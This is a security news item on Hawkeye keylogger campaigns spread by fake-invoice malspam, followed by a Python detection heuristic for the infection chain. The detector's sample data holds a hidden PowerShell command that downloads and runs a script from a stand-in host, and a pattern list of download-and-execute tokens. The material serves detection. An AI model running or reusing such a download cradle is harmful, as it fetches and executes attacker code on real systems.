Businesses around the world are being targeted by threat actors distributing the Hawkeye keylogger. IBM X-Force researchers identified major campaigns in April and May that targeted businesses across a range of industry sectors, including healthcare, transportation, logistics, marketing, agriculture, and importers and exporters.
The Hawkeye keylogger was first identified in 2013 and is still under active development. The malware is primarily an information stealer that is used to obtain login credentials and other sensitive information. The malware can also act as a loader for other malware variants and leverages its botnets to download malware onto infected devices as a service for third-party cybercriminals.
The malware is being offered on hacking forums and darknet marketplaces. The previous owner sold the malware in December 2018, and the new owner is offering it under a licensing model through a network of resellers as an “Advance Monitoring Solution”, with the promise of further updates to the malware over time.
Hawkeye Reborn v9 and v8 have been used in campaigns throughout April and May. Attacks with the new variant have been identified in Spain, the UAE, and the U.S., while the v8 campaign focused on users in Spain. The campaigns target business users, where the potential rewards for a successful infection are higher.
The malware is being distributed via malspam sent from servers in Estonia and Turkey. IBM X-Force researchers believe the same threat actor conducted both campaigns. Other threat actors are also believed to be using the malware.
The emails used in the attacks masquerade as messages from Spanish banks, other banks, and legitimate companies. The emails intercepted by IBM X-Force researchers were not particularly well written and did not include the spoofed company’s logo, but the sender’s name had been spoofed to make the messages appear to come from a legitimate domain.
The email messages carry a fake commercial invoice as an attachment. If it is opened, the invoice is displayed, but in the background the Hawkeye keylogger is downloaded. Several executable files are used in the infection process; these run malicious PowerShell scripts that download Hawkeye and secondary malware payloads. Once a device is infected, stolen information is exfiltrated via FTP, HTTP, and SMTP.
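The chain described above (a lure attachment, dropped executables, PowerShell download stagers, then exfiltration over FTP or SMTP) leaves a recognisable footprint in endpoint telemetry. The following Python heuristic is an added example written for this article, not IBM X-Force's tooling or anything from the Hawkeye campaigns. The Sysmon-style field names (ParentImage, Image, CommandLine, DestinationPort), the allowlists, and every sample event are constructed assumptions; HTTP exfiltration is deliberately not covered because generic web traffic is too noisy for a rule this simple.

```python
"""Two detection heuristics for a Hawkeye-style infection chain (added example).

Sample events below are constructed, not real telemetry; field names follow a
Sysmon-like shape but are an assumption of this example.
"""
import re
from typing import Dict, Iterable, List

# Parents from which a PowerShell child is suspicious: document viewers (the lure is
# an "invoice" attachment) and executables running from user-writable directories
# (dropped binaries in the chain). Both lists are illustrative assumptions.
DOCUMENT_VIEWERS = {"winword.exe", "excel.exe", "acrord32.exe", "outlook.exe"}
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.IGNORECASE)

# Command-line fragments typical of download-and-execute PowerShell stagers.
DOWNLOAD_TOKENS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|"
    r"\biex\b|invoke-expression|-enc(odedcommand)?\b|frombase64string",
    re.IGNORECASE,
)

# Exfiltration channels named in the report other than HTTP: FTP and SMTP ports.
EXFIL_PORTS = {21: "ftp", 25: "smtp", 465: "smtps", 587: "submission"}
# Processes expected to speak FTP/SMTP on a workstation (assumed allowlist).
EXFIL_ALLOWLIST = {"outlook.exe", "thunderbird.exe", "filezilla.exe", "winscp.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(event: Dict[str, object]) -> List[str]:
    """Reasons a process-creation event looks like the PowerShell stager step."""
    image = _basename(str(event.get("Image", "")))
    parent = str(event.get("ParentImage", ""))
    cmdline = str(event.get("CommandLine", ""))
    if image not in {"powershell.exe", "pwsh.exe"}:
        return []
    reasons = []
    if _basename(parent) in DOCUMENT_VIEWERS:
        reasons.append(f"powershell spawned by document viewer {_basename(parent)}")
    if USER_WRITABLE.search(parent):
        reasons.append("powershell spawned by executable in user-writable directory")
    if DOWNLOAD_TOKENS.search(cmdline):
        reasons.append("download/execute tokens in PowerShell command line")
    # Download cmdlets alone are common in admin scripts: require a suspicious parent too.
    return reasons if len(reasons) >= 2 else []


def check_network_connect(event: Dict[str, object]) -> List[str]:
    """Reasons a network-connection event looks like FTP/SMTP exfiltration."""
    image_path = str(event.get("Image", ""))
    image = _basename(image_path)
    port = int(event.get("DestinationPort", 0))
    if port not in EXFIL_PORTS or image in EXFIL_ALLOWLIST:
        return []
    reasons = [f"{image} connecting outbound on {EXFIL_PORTS[port]} port {port}"]
    if USER_WRITABLE.search(image_path):
        reasons.append("process runs from user-writable directory")
    return reasons


def scan(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Run both checks over an event stream and collect alerts."""
    alerts = []
    for ev in events:
        kind = ev.get("EventType")
        if kind == "ProcessCreate":
            reasons = check_process_create(ev)
        elif kind == "NetworkConnect":
            reasons = check_network_connect(ev)
        else:
            reasons = []
        if reasons:
            alerts.append({"host": ev.get("Host"), "image": ev.get("Image"), "reasons": reasons})
    return alerts


# Constructed sample events: one benign and one suspicious of each type.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventType": "ProcessCreate", "Host": "ws01",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
    {"EventType": "ProcessCreate", "Host": "ws02",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\invoice_4471.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -Command IEX "
                    "(New-Object Net.WebClient).DownloadString('http://stager.invalid/a.ps1')"},
    {"EventType": "NetworkConnect", "Host": "ws01",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "DestinationPort": 587},
    {"EventType": "NetworkConnect", "Host": "ws02",
     "Image": r"C:\Users\alice\AppData\Roaming\svchost32.exe",
     "DestinationPort": 21},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Both rules are tuned for low noise rather than completeness: the process rule needs a suspicious parent as well as download tokens, and the network rule ignores HTTP entirely, so it should be paired with proxy or DNS telemetry rather than relied on alone.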
IoCs are available on IBM X-Force Exchange.